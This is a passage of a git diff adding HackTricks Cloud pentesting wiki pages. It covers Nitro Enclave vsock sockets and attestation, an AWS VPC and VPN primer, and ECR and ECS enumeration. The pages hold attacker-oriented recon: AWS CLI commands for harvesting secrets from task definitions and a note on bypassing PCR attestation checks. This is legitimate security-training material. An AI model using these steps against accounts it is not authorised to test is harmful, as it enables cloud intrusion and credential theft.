+ +{% hint style="warning" %} +Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner). +{% endhint %} + +### Vsock Server/Listener + +Find here a couple of examples: + +* [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py) + +
+ +Simple Python Listener + +```python +#!/usr/bin/env python3 + +# From +https://medium.com/@F.DL/understanding-vsock-684016cf0eb0 + +import socket + +CID = socket.VMADDR_CID_HOST +PORT = 9999 + +s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) +s.bind((CID, PORT)) +s.listen() +(conn, (remote_cid, remote_port)) = s.accept() + +print(f"Connection opened by cid={remote_cid} port={remote_port}") + +while True: + buf = conn.recv(64) + if not buf: + break + + print(f"Received bytes: {buf}") +``` + +
+ +```bash +# Using socat +socat VSOCK-LISTEN:,fork EXEC:"echo Hello from server!" +``` + +### Vsock Client + +Examples: + +* [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py) + +
+ +Simple Python Client + +```python +#!/usr/bin/env python3 + +#From https://medium.com/@F.DL/understanding-vsock-684016cf0eb0 + +import socket + +CID = socket.VMADDR_CID_HOST +PORT = 9999 + +s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) +s.connect((CID, PORT)) +s.sendall(b"Hello, world!") +s.close() +``` + +
+ +```bash +# Using socat +echo "Hello, vsock!" | socat - VSOCK-CONNECT:3:5000 +``` + +### Vsock Proxy + +The tool vsock-proxy allows to proxy a vsock proxy with another address, for example: + +```bash +vsock-proxy 8001 ip-ranges.amazonaws.com 443 --config your-vsock-proxy.yaml +``` + +This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:443` and the file **`your-vsock-proxy.yaml`** might have this content allowing to access `ip-ranges.amazonaws.com:443`: + +```yaml +allowlist: +- {address: ip-ranges.amazonaws.com, port: 443} +``` + +It's possible to see the vsock addresses (**`:`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port): + +{% code overflow="wrap" %} +```bash +sudo ss -l -p -n | grep v_str +v_str LISTEN 0 0 3:8001 *:* users:(("vsock-proxy",pid=9458,fd=3)) +``` +{% endcode %} + +## Nitro Enclave Atestation & KMS + +The Nitro Enclaves SDK allows an enclave to request a **cryptographically signed attestation document** from the Nitro **Hypervisor**, which includes **unique measurements** specific to that enclave. These measurements, which include **hashes and platform configuration registers (PCRs)**, are used during the attestation process to **prove the enclave's identity** and **build trust with external services**. The attestation document typically contains values like PCR0, PCR1, and PCR2, which you have encountered before when building and saving an enclave EIF. + +From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-3-cryptographic-attestation#a-unique-feature-on-nitro-enclaves), these are the PCR values: + +
PCRHash of ...Description
PCR0Enclave image fileA contiguous measure of the contents of the image file, without the section data.
PCR1Linux kernel and bootstrapA contiguous measurement of the kernel and boot ramfs data.
PCR2ApplicationA contiguous, in-order measurement of the user applications, without the boot ramfs.
PCR3IAM role assigned to the parent instanceA contiguous measurement of the IAM role assigned to the parent instance. Ensures that the attestation process succeeds only when the parent instance has the correct IAM role.
PCR4Instance ID of the parent instanceA contiguous measurement of the ID of the parent instance. Ensures that the attestation process succeeds only when the parent instance has a specific instance ID.
PCR8Enclave image file signing certificateA measure of the signing certificate specified for the enclave image file. Ensures that the attestation process succeeds only when the enclave was booted from an enclave image file signed by a specific certificate.
+ +You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**. + +{% hint style="success" %} +Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail. +{% endhint %} + +### PCR Bypass + +From an attackers perspective, notice that some PCRs would allow to modify some parts or all the enclave image and would still be valid (for example PCR4 just checks the ID of the parent instance so running any enclave image in that EC2 will allow to fulfil this potential PCR requirement). + +Therefore, an attacker that compromise the EC2 instance might be able to run other enclave images in order to bypass these protections. + +The research on how to modify/create new images to bypass each protection (spcially the not taht obvious ones) is still TODO. 
+ +## References + +* [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0) +* All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md new file mode 100644 index 0000000000..2f490c3e88 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md @@ -0,0 +1,219 @@ +# AWS - VPC & Networking Basic Information + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## AWS Networking in a Nutshell + +A **VPC** contains a **network CIDR** like 10.0.0.0/16 (with its **routing table** and **network ACL**). + +This VPC network is divided in **subnetworks**, so a **subnetwork** is directly **related** with the **VPC**, **routing** **table** and **network ACL**. + +Then, **Network Interface**s attached to services (like EC2 instances) are **connected** to the **subnetworks** with **security group(s)**. + +Therefore, a **security group** will limit the exposed ports of the network **interfaces using it**, **independently of the subnetwork**. And a **network ACL** will **limit** the exposed ports to to the **whole network**. + +Moreover, in order to **access Internet**, there are some interesting configurations to check: + +* A **subnetwork** can **auto-assign public IPv4 addresses** +* An **instance** created in the network that **auto-assign IPv4 addresses can get one** +* An **Internet gateway** need to be **attached** to the **VPC** + * You could also use **Egress-only internet gateways** +* You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**. + * The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs) + +![](<../../../../.gitbook/assets/image (274).png>) + +## VPC + +Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resources into a virtual network** that you've defined. This virtual network will have several subnets, Internet Gateways to access Internet, ACLs, Security groups, IPs... + +### Subnets + +Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure. + +* Valid CIDR are from a /16 netmask to a /28 netmask. +* A subnet cannot be in different availability zones at the same time. 
+* **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. +* It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.** + +
+ +
+ +### Route Tables + +Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the: + +* Local VPC +* NAT +* Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet). + * In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. +* VPC endpoints (to access S3 from private networks) + +In the following images you can check the differences in a default public network and a private one: + +
+ +
+ +### ACLs + +**Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges. + +* It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections +* However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed + +### Security Groups + +Security groups are a virtual **firewall** that control inbound and outbound network **traffic to instances** in a VPC. Relation 1 SG to M instances (usually 1 to 1).\ +Usually this is used to open dangerous ports in instances, such as port 22 for example: + +
+ +### Elastic IP Addresses + +An _Elastic IP address_ is a **static IPv4 address** designed for dynamic cloud computing. An Elastic IP address is allocated to your AWS account, and is yours until you release it. By using an Elastic IP address, you can mask the failure of an instance or software by rapidly remapping the address to another instance in your account. + +### Connection between subnets + +By default, all subnets have the **automatic assigned of public IP addresses turned off** but it can be turned on. + +**A local route within a route table enables communication between VPC subnets.** + +If you are **connection a subnet with a different subnet you cannot access the subnets connected** with the other subnet, you need to create connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access internet, you need to assign the internet gateway to your subnet. + +### VPC Peering + +VPC peering allows you to **connect two or more VPCs together**, using IPV4 or IPV6, as if they were a part of the same network. + +Once the peer connectivity is established, **resources in one VPC can access resources in the other**. The connectivity between the VPCs is implemented through the existing AWS network infrastructure, and so it is highly available with no bandwidth bottleneck. As **peered connections operate as if they were part of the same network**, there are restrictions when it comes to your CIDR block ranges that can be used.\ +If you have **overlapping or duplicate CIDR** ranges for your VPC, then **you'll not be able to peer the VPCs** together.\ +Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 could communicate with each other directly, as can VPC 2 and VPC 3, however, VPC 1 and VPC 3 could not. 
**You can't route through one VPC to get to another.** + +### **VPC Flow Logs** + +Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**. + +Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**. + +Limitations: + +* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. +* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces +* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. +* The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. +* Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. +* Traffic relating to an Amazon Windows activation license from a Windows instance +* Traffic between a network load balancer interface and an endpoint network interface + +For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. 
+ +## VPN + +### Basic AWS VPN Components + +1. **Customer Gateway**: + * A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. + * It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. + * You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. + * It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. +2. **Virtual Private Gateway**: + * A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. + * It is attached to your VPC and serves as the target for your VPN connection. + * VPG is the AWS side endpoint for the VPN connection. + * It handles the secure communication between your VPC and your on-premises network. +3. **Site-to-Site VPN Connection**: + * A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. + * This type of connection requires a Customer Gateway and a Virtual Private Gateway. + * It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. + * Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. +4. **Client VPN Endpoint**: + * A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. + * It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. + * It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. + * With Client VPN, each client device uses a VPN client software to establish a secure connection. 
+ +### Site-to-Site VPN + +**Connect your on premisses network with your VPC.** + +* **VPN connection**: A secure connection between your on-premises equipment and your VPCs. +* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. + + Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. +* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. +* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. +* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. +* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. + +#### Limitations + +* IPv6 traffic is not supported for VPN connections on a virtual private gateway. +* An AWS VPN connection does not support Path MTU Discovery. + +In addition, take the following into consideration when you use Site-to-Site VPN. + +* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. + +### Client VPN + +**Connect from your machine to your VPC** + +#### Concepts + +* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. +* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. 
You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. +* **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. +* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. +* **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. +* **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. +* **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. +* **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. +* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. 
You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. +* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. + +#### Limitations + +* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. +* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** +* A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. +* The **client CIDR range cannot be changed** after you create the Client VPN endpoint. +* The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. +* You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. +* A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. +* Client VPN supports **IPv4** traffic only. +* Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. +* If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. + + ``` + SCRV1:: + ``` +* The self-service portal is **not available for clients that authenticate using mutual authentication**. 
+ +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md new file mode 100644 index 0000000000..f33f7488f1 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md @@ -0,0 +1,131 @@ +# AWS - ECR Enum + +## AWS - ECR Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +### ECR + +#### Basic Information + +Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. + +ECR is compose by 2 types of objects: **Registries** and **Repositories**. + +**Registries** + +Every AWS account has 2 registries: **Private** & **Public**. + +1. **Private Registries**: + +* **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission. + * The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/` +* **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles. +* **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS... +* **Other private registry options**: + * The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images. + * The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions. + * The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**. + * Specific **IAM policies** can be configured to grant different **permissions**. 
+ * The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo. + +2. **Public Registries**: + +* **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.** + * The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember. + +**Repositories** + +These are the **images** that in the **private registry** or to the **public** one. + +{% hint style="info" %} +Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**. +{% endhint %} + +#### Registry & Repository Policies + +**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image: + +
+ +#### Enumeration + +{% code overflow="wrap" %} +```bash +# Get repos +aws ecr describe-repositories +aws ecr describe-registry + +# Get image metadata +aws ecr list-images --repository-name +aws ecr describe-images --repository-name +aws ecr describe-image-replication-status --repository-name --image-id +aws ecr describe-image-scan-findings --repository-name --image-id +aws ecr describe-pull-through-cache-rules --repository-name --image-id + +# Get public repositories +aws ecr-public describe-repositories + +# Get policies +aws ecr get-registry-policy +aws ecr get-repository-policy --repository-name +``` +{% endcode %} + +#### Unauthenticated Enum + +{% content-ref url="../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md" %} +[aws-ecr-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) +{% endcontent-ref %} + +#### Privesc + +In the following page you can check how to **abuse ECR permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-ecr-privesc.md" %} +[aws-ecr-privesc.md](../aws-privilege-escalation/aws-ecr-privesc.md) +{% endcontent-ref %} + +#### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} +[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) +{% endcontent-ref %} + +#### Persistence + +{% content-ref url="../aws-persistence/aws-ecr-persistence.md" %} +[aws-ecr-persistence.md](../aws-persistence/aws-ecr-persistence.md) +{% endcontent-ref %} + +## References + +* [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md new file mode 100644 index 0000000000..198b4e8561 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md @@ -0,0 +1,108 @@ +# AWS - ECS Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## ECS + +### Basic Information + +Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**. + +ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**. + +* **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”. +* **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups. + * There **2 types of applications**: + * **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application. + * **Task**: A standalone task that runs and terminates. For example, a batch job. + * Among the service applications, there are **2 types of service schedulers**: + * [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node. 
+ * [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies. +* **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**... + * Check **env variables for sensitive info**! + +### Sensitive Data In Task Definitions + +Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within. + +Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions. + +### Enumeration + +```bash +# Clusters info +aws ecs list-clusters +aws ecs describe-clusters --clusters + +# Container instances +## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster. 
+aws ecs list-container-instances --cluster +aws ecs describe-container-instances --cluster --container-instances + +# Services info +aws ecs list-services --cluster +aws ecs describe-services --cluster --services +aws ecs describe-task-sets --cluster --service + +# Task definitions +aws ecs list-task-definition-families +aws ecs list-task-definitions +aws ecs list-tasks --cluster +aws ecs describe-tasks --cluster --tasks +## Look for env vars and secrets used from the task definition +aws ecs describe-task-definition --task-definition : +``` + +### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md" %} +[aws-ecs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) +{% endcontent-ref %} + +### Privesc + +In the following page you can check how to **abuse ECS permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-ecs-privesc.md" %} +[aws-ecs-privesc.md](../aws-privilege-escalation/aws-ecs-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-ecs-post-exploitation.md" %} +[aws-ecs-post-exploitation.md](../aws-post-exploitation/aws-ecs-post-exploitation.md) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-ecs-persistence.md" %} +[aws-ecs-persistence.md](../aws-persistence/aws-ecs-persistence.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md new file mode 100644 index 0000000000..75d6aad445 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md @@ -0,0 +1,174 @@ +# AWS - EFS Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
